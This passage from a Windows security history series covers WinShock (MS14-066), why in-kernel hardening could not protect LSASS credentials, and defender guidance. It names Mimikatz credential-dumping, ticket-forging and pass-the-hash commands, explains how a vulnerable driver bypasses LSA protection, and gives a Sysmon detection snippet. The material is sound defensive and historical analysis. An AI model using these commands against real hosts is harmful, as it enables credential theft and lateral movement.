&lt;p&gt;By late 2014 Microsoft was already prototyping the Hyper-V-as-security-boundary architecture that becomes Virtualisation-Based Security, &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt;, and Hypervisor-protected Code Integrity in Windows 10 1507 on July 29, 2015 [@ms-credential-guard]. For the Part 3 reader, the key observation is that Microsoft had already concluded by mid-2014 that no amount of in-VTL0 hardening could close the credential-replay gap structurally, and that the architectural answer required moving the credential cache to a different privilege domain than the kernel attackers compromise.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Restricted Admin reduced disclosure but not replay. RunAsPPL stopped a Mimikatz invocation only until BYOVD. The Pass-the-Hash tiering model named the problem but had no enforcement primitive inside the operating system. Microsoft&apos;s counter-pivot in the Part 3 window was correct in direction and &lt;em&gt;insufficient by construction&lt;/em&gt; -- because the architecture was the problem, not the engineering.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft shipped the right primitives. None of them was sufficient by construction, because the architecture was the problem. To see why, we have to look at the one structural thing the window left open: the SChannel attack surface, and the impossibility argument behind it.&lt;/p&gt;
&lt;h2&gt;7. The SChannel Coda: WinShock (MS14-066, November 11, 2014)&lt;/h2&gt;
&lt;p&gt;The window closes on November 11, 2014 with the last great pre-cloud TLS-stack remote code execution in Windows. WinShock is a counterpoint that reinforces the article&apos;s thesis rather than contradicting it: even with every credential-layer control of 2013-2014 deployed, an unrelated per-binary defect in the Schannel TLS stack could still hand an attacker remote code execution before any application code ran. The credential-layer hardening Microsoft spent the year shipping could not have prevented this bug, and the bug&apos;s existence is part of the evidence that hardening one layer leaves orthogonal layers exposed.&lt;/p&gt;
&lt;p&gt;A note up front, because the popular framing got this wrong. The bulletin itself was &lt;em&gt;not&lt;/em&gt; silent. MS14-066 was published on the November 11, 2014 Patch Tuesday with a Critical severity rating, an explicit CVE assignment (CVE-2014-6321), contemporary Brian Krebs coverage [@krebs-ms14-066], and public proof-of-concept walkthroughs within months [@nvd-cve-2014-6321]. The &quot;silent&quot; framing applies only to the additional Schannel hardening fixes Microsoft bundled into the same update without separate disclosures.&lt;/p&gt;
&lt;h3&gt;7.1 The mechanism&lt;/h3&gt;
&lt;p&gt;A crafted TLS handshake triggered a memory-corruption path inside &lt;code&gt;schannel.dll&lt;/code&gt;, the Windows Secure Channel security package that implements TLS for every in-box TLS consumer [@ms-bulletin-ms14-066; @nvd-cve-2014-6321]. The bug allowed remote code execution before any application code ran -- the handshake itself was the attack. The NVD entry catalogues the affected platforms as Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 -- essentially every supported Windows of the era [@nvd-cve-2014-6321].&lt;/p&gt;
&lt;p&gt;The attack surface was universal across the Windows enterprise estate of late 2014. Every IIS host terminating HTTPS, every SMB-over-HTTPS endpoint, every RDP-over-TLS listener, every Exchange ActiveSync endpoint, every Active Directory Federation Services endpoint terminating TLS in Schannel was exposed. A defensible writer-side abstraction (which this article takes) is that a crafted handshake triggered a memory-corruption path; the precise internal type and function family Microsoft fixed are not safely attributable without a primary-source walkthrough beyond the bulletin&apos;s published abstract.&lt;/p&gt;
&lt;h3&gt;7.2 The bundled extras&lt;/h3&gt;
&lt;p&gt;Microsoft bundled additional Schannel hardening into MS14-066 without separate bulletins. The article does not name specific CVE IDs for those bundled extras because prior pipeline runs found such attributions factually wrong (those CVE IDs belong to other bulletins or are REJECTED in NVD). The defensible framing is that Microsoft bundled additional Schannel hardening into the same update without separate bulletins, anchored to contemporary coverage of the patch cycle [@krebs-ms14-066]. The substantive point survives without speculative CVE attribution.&lt;/p&gt;
&lt;p&gt;The &quot;no public exploitation&quot; framing of MS14-066 is wrong. BeyondTrust&apos;s &quot;Triggering MS14-066&quot; blog post and the SecuritySift &quot;Exploiting MS14-066 (CVE-2014-6321) aka &apos;Winshock&apos;&quot; walkthrough are both referenced from the NVD entry as Exploit Third Party Advisory [@nvd-cve-2014-6321]. The CVE was patched, and the exploitation tradecraft was public; only the bundled hardening extras went unannotated.&lt;/p&gt;
&lt;h3&gt;7.3 Strategic significance&lt;/h3&gt;
&lt;p&gt;WinShock is the bookend on an era when the Windows Schannel stack was the front door of every enterprise. After 2014, TLS termination for major Windows estates increasingly happened at Azure Front Door, Akamai, Cloudflare, or AWS Application Load Balancer rather than at the Windows Schannel layer. Microsoft&apos;s own first-party services -- Exchange Online, SharePoint Online, the Office 365 ingress fleet -- terminated TLS at Azure-managed edge appliances, the topology documented in Microsoft&apos;s &lt;em&gt;Microsoft 365 network connectivity principles&lt;/em&gt; as the recommended &quot;connect locally to the Microsoft global network&quot; architecture in which the customer&apos;s traffic enters Microsoft&apos;s network as close to the user as possible and TLS is terminated at the nearest edge node [@ms-365-network-principles]. The architectural lesson is not that Schannel was uniquely fragile; it is that monolithic TLS stacks across hundreds of in-box consumers were a brittle design that the industry stopped accepting as the default deployment topology for enterprise services.&lt;/p&gt;
&lt;p&gt;WinShock closed the window with a per-binary patch. But the bigger story -- the credential layer Microsoft had spent the year trying to close -- was structurally broken in a way no patch could fix. To see why, we have to make the impossibility argument formally.&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits: Why No Per-Binary Hardening Could Fix the Credential Layer&lt;/h2&gt;
&lt;p&gt;A reframe. Every section so far has narrated &lt;em&gt;evidence&lt;/em&gt;. This section turns that evidence into an argument from architecture -- a structural reason the per-binary playbook &lt;em&gt;could not have&lt;/em&gt; fixed the credential layer, regardless of how good Microsoft&apos;s engineering was.&lt;/p&gt;
&lt;h3&gt;8.1 The trusted-computing-base argument&lt;/h3&gt;
&lt;p&gt;Every authenticated Windows process must, at some point, hold a verifiable secret. As §4.1 established, the single sign-on contract forces LSASS to hold a recoverable secret in memory [@ms-credentials-processes]. As long as that secret lives in a memory space the OS can read, an attacker who reaches that memory space can read it too.&lt;/p&gt;
&lt;p&gt;AppLocker, ASLR, DEP, AppContainer, ELAM, and Secure Boot are all per-binary mitigations [@ms-applocker; @ms-elam; @ms-secure-boot]. They prevent the &lt;em&gt;wrong&lt;/em&gt; code from running. They do not prevent the &lt;em&gt;right&lt;/em&gt; code (an administrator-launched Mimikatz; a Microsoft-signed but vulnerable third-party kernel driver) from reading LSASS memory through documented Win32 APIs. The per-binary playbook is a code-execution control, not a memory-access control, and the credential-theft attack is not a code-execution attack.&lt;/p&gt;
&lt;h3&gt;8.2 The asymmetry&lt;/h3&gt;
&lt;p&gt;The defender must close 100% of the per-binary attack surface to prevent a single piece of attacker code from running. The attacker needs only one credential primitive to remain extractable to win. The two budgets are not comparable. The defender&apos;s job is exponentially harder by construction, and any single residual gap -- one unsigned plug-in, one cached WDigest plaintext, one stolen NT hash -- gives the attacker domain-wide replay. This is not a Microsoft engineering failure. It is an architectural inevitability of the in-VTL0 LSASS model.&lt;/p&gt;
&lt;h3&gt;8.3 The VTL0-symmetry argument&lt;/h3&gt;
&lt;p&gt;In any single-privilege-ring operating system, no protection mechanism implemented &lt;em&gt;inside&lt;/em&gt; that ring can structurally defend a memory region against an attacker who reaches that ring. This is the formal statement of the limit Microsoft hit in 2014.&lt;/p&gt;
&lt;p&gt;RunAsPPL is the strongest 2014-era expression of this bound. As §6.2 documented, a BYOVD-loaded kernel driver can clear the &lt;code&gt;Protection&lt;/code&gt; byte on the LSASS &lt;code&gt;EPROCESS&lt;/code&gt; and &lt;code&gt;OpenProcess(PROCESS_VM_READ)&lt;/code&gt; succeeds [@itm4n-lsa-protection; @ms-lsa-protection]; the protection is enforced by the same kernel the attacker is compromising; the kernel cannot enforce a protection against itself.&lt;/p&gt;
&lt;p&gt;The architectural way to state it: $\text{Protection}&lt;em&gt;{\text{in-ring}}(M) \lt \text{Adversary}&lt;/em&gt;{\text{in-ring}}(M)$ for any memory region $M$ in the same privilege ring as the adversary. The protection function and the adversary function operate on the same domain, and the adversary always wins by construction. The algebraic notation is informal; the formal capture is the Bell-LaPadula / Lampson confinement bound, which states that in a single-privilege-ring system an adversary who reaches that ring can read any memory the kernel can map [@wikipedia-bell-lapadula]. Closing the gap requires moving $M$ to a privilege domain $\text{D}&apos;$ such that the in-ring adversary cannot map $\text{D}&apos;$ at all.&lt;/p&gt;
&lt;p&gt;That is exactly what Virtualisation-Based Security does in Windows 10 1507 [@ms-credential-guard]. Hyper-V boots before the Windows kernel and creates two Virtual Trust Levels: VTL0 is the normal Windows kernel attackers compromise; VTL1 is Virtual Secure Mode, an isolated execution domain whose memory the VTL0 kernel cannot read because the hypervisor&apos;s Second-Level Address Translation tables deny the mapping. Credential Guard hosts an LSA Isolated trustlet (LSAISO) in VTL1 that holds the high-value credential material; the VTL0 LSASS process holds only obfuscated references that LSAISO can resolve. A Mimikatz invocation in VTL0 can still extract the references, but the references no longer dereference to a credential the VTL0 kernel can read.&lt;/p&gt;

As long as the kernel that protects LSASS executes in the same privilege ring as the kernel an attacker compromises, every protection inside that ring is bypassable. The credential cache must live in a different privilege domain than the kernel that the attacker can compromise.
&lt;h3&gt;8.4 The way out, foreshadowed&lt;/h3&gt;
&lt;p&gt;Hardware-rooted isolation of the credential cache is the only structural answer. Virtualisation-Based Security, Credential Guard, and the LSAISO trustlet in VTL1 -- the spine of &lt;a href=&quot;https://paragmali.com/blog/above-the-kernel-the-windows-security-wars-part-4-2015-2019/&quot; rel=&quot;noopener&quot;&gt;Part 4&lt;/a&gt; -- are the architectural answer to the architectural problem the Part 3 window proves cannot be closed inside VTL0 [@ms-credential-guard]. The article closes the Part 3 argument by naming the problem precisely so Part 4 can name the solution precisely.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Hardware-rooted isolation of the credential cache -- the LSAISO trustlet in a VTL1 the VTL0 kernel cannot read -- is the only structural answer. Part 4 ships it. Part 3 names &lt;em&gt;why&lt;/em&gt; it had to.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The architecture was the problem. What did practitioners do with this evidence at the end of 2014?&lt;/p&gt;
&lt;h2&gt;9. Open Problems at the End of 2014&lt;/h2&gt;
&lt;p&gt;Picture a Fortune-500 security operations centre on a Friday afternoon in early December 2014. The team has applied every Microsoft patch through MS14-066 [@ms-bulletin-ms14-066], deployed AppLocker on Enterprise SKUs [@ms-applocker], set &lt;code&gt;RunAsPPL = 1&lt;/code&gt; after a careful LSA plug-in audit [@ms-lsa-protection], applied KB2871997 to disable WDigest plaintext storage [@kb2871997], and read the Mitigating Pass-the-Hash v2 whitepaper cover to cover [@ms-pth-v2]. They run an internal red-team exercise the following Monday. Mimikatz still works. Why?&lt;/p&gt;
&lt;p&gt;The credential layer is still essentially open. WDigest plaintext storage is now opt-out by default on freshly patched hosts, which closes the single most embarrassing primitive Delpy&apos;s 2011 demonstration exposed [@kb2871997]. But the cached NT hashes that NTLM authentication needs, the Kerberos Ticket-Granting Tickets the SSO contract holds in the LSA ticket cache, and the krbtgt master signing key on any domain controller whose LSASS the attacker can &lt;code&gt;OpenProcess&lt;/code&gt; against all remain extractable [@mimikatz-github; @ms-credentials-processes]. RunAsPPL stops a Mimikatz invocation from user mode, but it does not stop Mimikatz from invoking its own &lt;code&gt;mimidrv.sys&lt;/code&gt; driver (or any other vulnerable signed third-party driver) to clear the protection byte from kernel mode and proceed [@itm4n-lsa-protection; @mimikatz-github]. The same &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; that worked in May 2011 still works in December 2014 on every estate that has not stripped its third-party drivers down to a zero-BYOVD baseline -- which is no real estate at all.&lt;/p&gt;
&lt;p&gt;One open problem the security community debated through 2014 deserves a sharper treatment because it surfaces the &lt;em&gt;structural&lt;/em&gt; limit of any in-LSASS hardening strategy: why does Microsoft not simply relocate or obfuscate the LSA secret structures whose offsets Mimikatz hard-codes? The Mimikatz codebase carries explicit, per-Windows-build signature and offset tables (for example the &lt;code&gt;lsasrv&lt;/code&gt; &lt;code&gt;LogonSessionList&lt;/code&gt; table in &lt;code&gt;mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c&lt;/code&gt;, with package-specific offsets such as WDigest in &lt;code&gt;kuhl_m_sekurlsa_wdigest.c&lt;/code&gt;) that map every supported Windows build to the byte offsets and signature byte sequences Mimikatz scans for at run time [@mimikatz-sekurlsa-source]. The maintenance cost on the offensive side is one row per shipped Windows build per quarter. The proposed defensive response -- shuffle the struct layouts each cumulative update, randomise the symbol offsets, swap the byte signatures -- fails as a defence for three independent reasons. First, cost asymmetry. Microsoft would commit the test, validation, and Windows Hardware Quality Labs re-certification cost of every layout shuffle across every supported Windows SKU, language pack, and architecture every quarter; Mimikatz&apos;s maintainers would commit one pull request and one signature-table row per build. Second, defender-side fragility. The same LSASS structures the offsets index are consumed by Microsoft&apos;s own security tooling, by every third-party Endpoint Detection and Response agent, and by Windows Error Reporting; randomising the layout breaks the defender&apos;s own dependencies first and the attacker&apos;s last. Third, adversary-side robustness. Mimikatz already supports pattern-based signature scanning that finds the target structures even when their absolute offsets move; the offset hard-coding is a performance optimisation, not a requirement. The only structural defence is the one the engineering pipeline is already building: lift the credential cache out of the VTL0 user-mode process space entirely and into a Virtualisation-Based Security trustlet whose memory the VTL0 kernel cannot read. Alex Ionescu&apos;s Black Hat USA 2015 &quot;Battle of SKM and IUM&quot; talk lays out the VTL1 / IUM architecture in operator-facing detail and forward-references the Credential Guard design that ships in Windows 10 1507 [@ionescu-skm-ium-bhusa15]. The Part 3 community could see the answer; the architectural prerequisites simply had not yet shipped.&lt;/p&gt;
&lt;p&gt;Microsoft is prototyping Virtualisation-Based Security and Credential Guard, but the architectural answer ships outside this article&apos;s window [@ms-credential-guard]. Even after it ships, Credential Guard requires Windows 10 Enterprise, UEFI 2.3.1, Secure Boot, a 64-bit CPU with virtualisation extensions, and -- on most estates -- a hardware refresh cycle that costs years and millions. The deployment surface that needs the protection most cannot adopt it until well into 2017.&lt;/p&gt;
&lt;p&gt;AppLocker still carries its Windows 7 structural gaps in late 2014: the Application Identity service can be stopped by any process running as LocalSystem, after which enforcement degrades open until reboot, and the dual-DACL bypass class (rules that pass both Publisher and Path checks but reach a different binary at runtime) remains unaddressed [@ms-applocker; @ms-applocker-design]. Windows Defender Application Control -- the kernel-enforced policy successor that closes both gaps -- is still a Windows 10 enterprise feature in the Part 4 window. Secure Boot has its first &lt;code&gt;dbx&lt;/code&gt; revocation politics in this window: Microsoft&apos;s revocation list has to retire compromised UEFI bootloaders without bricking dual-boot Linux installations on the millions of OEM machines that ship with Secure Boot enabled, and the cadence and scope of &lt;code&gt;dbx&lt;/code&gt; updates becomes a recurring operational point of friction between Microsoft, OEMs, and the Linux distribution community [@ms-secure-boot; @mjg59-shim-signed]. The Pass-the-Hash v2 tiering recommendations are aspirational for the vast majority of 2014 deployments -- a complete tier 0 / tier 1 / tier 2 administrative-account programme is a multi-year project that requires Active Directory restructuring, change-management governance, and operator retraining at scale, and most estates that read the v2 paper applied KB2871997 and stopped there [@ms-pth-v2].&lt;/p&gt;
&lt;p&gt;Mimikatz&apos;s post-Part-3 modules (Skeleton Key and DCSync; see §11 FAQ) sit in the same codebase, are anchor events in the Part 4 window, and define the credential-replay horizon the Part 3 reader is staring at [@secureworks-skeleton-key; @metcalf-dcsync].&lt;/p&gt;
&lt;p&gt;The defining open question at the end of 2014 is how Microsoft isolates a long-lived user-mode process (LSASS) holding the most valuable secrets in the operating system from an administrator-privileged attacker on the same host, without breaking the hundreds of in-tree dependencies LSASS has accumulated since NT 3.1. The answer -- Virtualisation-Based Security plus the trustlet model -- is the spine of Part 4. It requires a hypervisor, a hardware-rooted boot chain, a re-architected LSA plug-in protocol that splits sensitive operations into LSAISO trustlet calls, and an operational deployment story that took Microsoft from late 2014 prototypes to general availability in 2015 and broad enterprise adoption only by 2018-2019.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; At the end of 2014, WDigest plaintext storage is closed by default. NT hashes, Kerberos TGTs, the krbtgt master key, and every other secret LSASS holds in recoverable form remain extractable by any administrator on the same host who can load a kernel driver. The architectural answer -- Credential Guard in Windows 10 1507 -- ships eight months later [@ms-credential-guard]. The Part 3 window proves the problem is real; Part 4 ships the answer.&lt;/p&gt;
&lt;/blockquote&gt;

Even at end-of-2014, with every Microsoft control available, the dominant Fortune-500 estate had applied the WDigest opt-out [@kb2871997] and almost nothing else. Tiering [@ms-pth-v2] is a multi-year programme. RunAsPPL [@ms-lsa-protection] requires an LSA plug-in audit that breaks any custom credential provider not yet re-signed at the PPL signer level. The architectural answer -- Credential Guard in 2015 [@ms-credential-guard] -- arrives to a deployment surface still struggling to deploy the 2013 controls. The gap between *the security primitive Microsoft shipped* and *the security primitive a Fortune-500 estate actually had running* was the largest it had ever been, and it grew through the Windows 10 1507 General Availability window.
&lt;p&gt;Eight open problems. None of them admits a Part 3-era technical solution. So how does a practitioner read the 2009-2014 primitives against a 2026 Windows 11 baseline?&lt;/p&gt;
&lt;h2&gt;10. Practical Guide: Reading the 2009-2014 Primitives Against a 2026 Windows 11 Baseline&lt;/h2&gt;
&lt;p&gt;The previous nine sections built the structural argument. This section answers the operator&apos;s question: which of these 2009-2014 primitives are still load-bearing in 2026, and which were superseded?&lt;/p&gt;
&lt;h3&gt;10.1 Which Part 3 primitives are still load-bearing in 2026&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Primitive (Part 3)&lt;/th&gt;
&lt;th&gt;Still in use 2026?&lt;/th&gt;
&lt;th&gt;Superseded by&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;AppLocker (Win 7+) [@ms-applocker]&lt;/td&gt;
&lt;td&gt;Yes, on Windows 10/11 Enterprise estates&lt;/td&gt;
&lt;td&gt;App Control for Business (WDAC) for new deployments&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ELAM (Win 8+) [@ms-elam]&lt;/td&gt;
&lt;td&gt;Yes, load-bearing for the boot chain on every supported Windows&lt;/td&gt;
&lt;td&gt;Unchanged primitive; Defender&apos;s WdBoot.sys is the in-box ELAM driver&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UEFI Secure Boot (Win 8+) [@ms-secure-boot]&lt;/td&gt;
&lt;td&gt;Yes; mandatory for Windows 11 hardware certification&lt;/td&gt;
&lt;td&gt;Strengthened with mandatory dbx revocation enforcement&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AppContainer (Win 8+) [@windows-internals-6e-p1]&lt;/td&gt;
&lt;td&gt;Yes; substrate for MSIX, Edge renderers, Win32 App Isolation, Recall trustlet&lt;/td&gt;
&lt;td&gt;Generalised across all packaged Win32 apps via App Isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LSA Protected Process (Win 8.1+) [@ms-lsa-protection]&lt;/td&gt;
&lt;td&gt;Yes; &lt;em&gt;on by default&lt;/em&gt; on &lt;strong&gt;new installations&lt;/strong&gt; of Windows 11 22H2 and later (upgraded systems retain default-off and require manual or GPO enablement)&lt;/td&gt;
&lt;td&gt;Complemented by Credential Guard on enterprise hardware&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Restricted Admin RDP (Win 8.1+) [@kb2871997]&lt;/td&gt;
&lt;td&gt;Yes; still recommended&lt;/td&gt;
&lt;td&gt;Remote Credential Guard (Win 10 1607+) for high-tier environments&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WDigest plaintext disablement (KB2871997) [@kb2871997]&lt;/td&gt;
&lt;td&gt;Default on every supported Windows since 2014&lt;/td&gt;
&lt;td&gt;Unchanged primitive; WDigest itself is essentially deprecated&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mitigating Pass-the-Hash tiering model [@ms-pth-v2]&lt;/td&gt;
&lt;td&gt;Yes; lives on as Privileged Access Workstations and Enterprise Access Model&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Securing Privileged Access&lt;/em&gt; online documentation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Two surprises in the table. First, LSA Protected Process is &lt;em&gt;on by default&lt;/em&gt; on &lt;strong&gt;new installations&lt;/strong&gt; of Windows 11 22H2 and later -- which closes the gap for newly-shipped devices, though estates that upgraded from earlier Windows versions still require the manual or GPO enablement step that defined the 2014-2020 period. Second, AppLocker is still in production on enterprise estates ten-plus years after Windows 7 General Availability; the WDAC successor is the recommendation for new deployments, but the installed AppLocker base did not get replaced.&lt;/p&gt;
&lt;h3&gt;10.2 Mimikatz tradecraft as the floor of red-team capability&lt;/h3&gt;
&lt;p&gt;On any pre-Credential-Guard Windows estate -- and that is still a non-trivial fraction of the 2026 install base -- Mimikatz&apos;s 2011-2014 module set defines the floor of red-team capability. &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; reads every LSA-cached credential the operator&apos;s privileges allow [@mimikatz-github]. &lt;code&gt;sekurlsa::tickets /export&lt;/code&gt; extracts every Kerberos ticket from the LSA cache. &lt;code&gt;lsadump::secrets&lt;/code&gt; reads LSA private secrets. &lt;code&gt;lsadump::sam&lt;/code&gt; reads local SAM hashes. &lt;code&gt;kerberos::ptt&lt;/code&gt; re-imports tickets for replay. &lt;code&gt;kerberos::golden&lt;/code&gt; forges Golden Tickets given a stolen krbtgt hash [@metcalf-golden-ticket]. The Part 3 window&apos;s primitives are the foundation any practitioner reasoning about lateral movement in a Windows-AD estate uses every day, and the conceptual model Sean Metcalf documented on ADSecurity.org remains the canonical operator-grade reference.&lt;/p&gt;
&lt;h3&gt;10.3 Detection&lt;/h3&gt;
&lt;p&gt;Where to look. Sysmon ProcessAccess events on LSASS (event ID 10) with Granted Access masks of &lt;code&gt;0x1010&lt;/code&gt;, &lt;code&gt;0x1410&lt;/code&gt;, or &lt;code&gt;0x143A&lt;/code&gt; correspond to the read-and-decrypt access pattern Mimikatz&apos;s &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; requires; the masks decompose into &lt;code&gt;PROCESS_VM_READ + PROCESS_QUERY_LIMITED_INFORMATION&lt;/code&gt; (0x1010), plus &lt;code&gt;PROCESS_VM_OPERATION&lt;/code&gt; (0x1410), plus &lt;code&gt;PROCESS_VM_WRITE + PROCESS_CREATE_THREAD&lt;/code&gt; (0x143A), and are widely-attested operator-grade detection lore catalogued across EDR vendor blogs and MITRE ATT&amp;amp;CK T1003.001 (OS Credential Dumping: LSASS Memory) sub-techniques [@mitre-t1003-001]. Windows Security event 4673 (sensitive privilege use) on &lt;code&gt;SeDebugPrivilege&lt;/code&gt; fires when a process adjusts its token to enable debug privileges -- the prerequisite for &lt;code&gt;privilege::debug&lt;/code&gt; -- which is interesting in itself when the actor is not a known debugger. System Access Control Lists on the krbtgt account, paired with Domain Controller audit subcategories for Kerberos AS-REQ and TGS-REQ, surface the AS-REQ-without-corresponding-logon anomalies that Golden Ticket use produces [@metcalf-golden-ticket]. Microsoft Defender for Identity raises Suspected Golden Ticket and Suspected Skeleton Key alerts on its analysis of domain-controller telemetry (the Skeleton Key alert is a Part 4 forward reference).&lt;/p&gt;
&lt;p&gt;{`
// Conceptual classifier for Sysmon event ID 10 (ProcessAccess) targeting LSASS.
// The canonical &quot;read-and-decrypt&quot; mask pattern Mimikatz needs to call
// OpenProcess + ReadProcessMemory + BCryptDecrypt against LSASS.
function isMimikatzLikely(event) {
  if (event.id !== 10) return false;
  if (!/lsass.exe$/i.test(event.targetImage)) return false;
  const interesting = new Set([&apos;0x1010&apos;, &apos;0x1410&apos;, &apos;0x143A&apos;]);
  return interesting.has(event.grantedAccess.toLowerCase().toUpperCase());
}&lt;/p&gt;
&lt;p&gt;const sample = {
  id: 10,
  targetImage: &apos;C:\\Windows\\System32\\lsass.exe&apos;,
  grantedAccess: &apos;0x1410&apos;,
  sourceImage: &apos;C:\\tools\\mimikatz.exe&apos;
};&lt;/p&gt;
&lt;p&gt;console.log(&apos;Alert?&apos;, isMimikatzLikely(sample));
console.log(&apos;SOCs combine this with allow-listed debugger paths and PPL state.&apos;);
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The same Restricted Admin flag that closes the disclosure-at-server gap [@kb2871997] also enables a Pass-the-Hash operator to invoke &lt;code&gt;sekurlsa::pth /run:&quot;mstsc /restrictedadmin&quot;&lt;/code&gt; from a compromised host and authenticate to the target RDP server using only the stolen NT hash [@mimikatz-github]. Restricted Admin is a &lt;em&gt;disclosure&lt;/em&gt; mitigation, not a &lt;em&gt;replay&lt;/em&gt; mitigation. Combine it with Remote Credential Guard (Windows 10 1607+) on tier 0 administrative paths.&lt;/p&gt;
&lt;/blockquote&gt;

1. Apply KB2871997 with `UseLogonCredential = 0` on every supported Windows. Zero downside.
2. Enable `RunAsPPL = 1` after a one-cycle LSA plug-in audit. Plan a rollback for any custom credential provider not yet re-signed at the PPL signer level [@ms-lsa-protection].
3. Adopt the Pass-the-Hash v2 tiering model as planning vocabulary, then operationalise it as Microsoft&apos;s *Securing Privileged Access* / Enterprise Access Model documentation. Multi-year programme; treat as a roadmap [@ms-pth-v2].
4. Use Restricted Admin for administrative RDP; promote to Remote Credential Guard on tier 0 paths.
5. Run AppLocker on every Enterprise SKU you have not yet migrated to WDAC [@ms-applocker]. Ensure the Application Identity service (`AppIDSvc`) is set to start automatically by policy, since AppLocker does not enforce when it is stopped.
6. Enable Secure Boot, Measured Boot, and BitLocker (TPM + PIN) on every laptop [@ms-secure-boot]. Microsoft&apos;s default platform validation profile on native UEFI + Secure Boot systems is PCR 7 (Secure Boot State) and PCR 11 (BitLocker access control), which is the *correct* profile to use when Secure Boot is on and the platform&apos;s option ROMs are trusted [@ms-bitlocker-configure]. For hardened estates that want to detect tampering with the UEFI firmware itself, the option-ROM configuration, or the boot-manager binary independent of Secure Boot&apos;s signature check, expand the profile to PCRs 0, 2, 4, 7, 11 -- adding PCR 0 (UEFI firmware code), PCR 2 (option-ROM code), and PCR 4 (boot-manager binary measurements) on top of the default [@ms-bitlocker-countermeasures]. The hardened profile generates more BitLocker recovery-key prompts after legitimate firmware updates, so the operational cost is real and the choice between the two profiles is the standard balance between detection coverage and help-desk load.
7. Enable Credential Guard (Windows 10 1607+) on every estate whose hardware supports it [@ms-credential-guard]. This is the architectural answer; everything above is harm reduction.
&lt;p&gt;The 2009-2014 primitives are still here. So is Mimikatz. Part 4 explains why, and what Microsoft did about it.&lt;/p&gt;
&lt;h2&gt;11. Frequently asked questions&lt;/h2&gt;

No. The four zero-days -- MS10-046 (LNK shortcut RCE), MS10-061 (Print Spooler RCE), MS10-073 (win32k.sys keyboard-layout LPE), and MS10-092 (Task Scheduler LPE) -- were used across the worm&apos;s propagation and escalation surfaces, *not* chained in a single sequential exploit [@symantec-stuxnet-dossier-v14; @ms-bulletin-ms10-046; @ms-bulletin-ms10-061; @ms-bulletin-ms10-073; @ms-bulletin-ms10-092]. Different hosts encountered different combinations depending on patch level, USB usage, network shape, and whether the local user already had administrative privileges.

Only with two qualifiers -- multi-zero-day and kinetic-physical effect. Operation Aurora (January 12, 2010) used a single Internet Explorer 0-day (CVE-2010-0249) against Google and at least twenty other named victims including Adobe, Juniper, Yahoo, Symantec, Northrop Grumman, Dow Chemical, and Morgan Stanley (full sourcing and the verbatim Google wording in §3.6) [@google-aurora-wayback; @nvd-cve-2010-0249]; Stuxnet (June 17, 2010) used four zero-days for kinetic effect [@symantec-stuxnet-dossier-v14]. Drop either qualifier and Aurora falsifies the framing.

No. The Pass-the-Hash concept dates to Paul Ashton&apos;s 1997 NTBugtraq post [@wikipedia-pth] and was operationalised by Hernan Ochoa&apos;s 2008 Pass-the-Hash Toolkit (`iam.exe` / `whosthere.exe`) at Core Security Corelabs [@core-ptht-2008]. What Mimikatz did was make the primitive operational on a default-configured modern Windows host without requiring custom NTLM client code [@greenberg-mimikatz-wired; @mimikatz-github]. It turned a known protocol weakness into a one-line operator tool that ran against any LSASS the operator could `OpenProcess` against, and it added the Kerberos primitives (Pass-the-Ticket, Overpass-the-Hash, Golden Ticket) that previous Pass-the-Hash toolchains had not addressed. Skip Duckwall and Chris Campbell&apos;s *Pass-the-Hash 2: The Admin&apos;s Revenge* at Black Hat USA 2013 formalised the graph-walking discipline that ties Mimikatz primitives together into the lateral-movement operating model the rest of the decade inherits [@duckwall-campbell-bh2013].

Partially. The headline CVE (CVE-2014-6321) was patched on a published Patch Tuesday bulletin on November 11, 2014 [@ms-bulletin-ms14-066; @nvd-cve-2014-6321] with contemporary KrebsOnSecurity coverage [@krebs-ms14-066] and public proof-of-concept walkthroughs within months. The &quot;silent&quot; framing applies only to the additional Schannel hardening fixes Microsoft bundled into the same bulletin without separate disclosures. This article deliberately does not name specific CVE IDs for those bundled extras, because prior pipeline runs found such attributions factually wrong.

It wasn&apos;t, because Microsoft published v1 in December 2012 [@ms-pth-v1-landing] and v2 in July 2014 [@ms-pth-v2] and then migrated subsequent guidance into the post-2014 *Securing Privileged Access* online documentation rather than producing a numbered v3 PDF. Any &quot;v3 2017&quot; reference in secondary sources is incorrect; the canonical documentation chain after v2 is the *Securing Privileged Access* and *Enterprise Access Model* pages on Microsoft Learn.

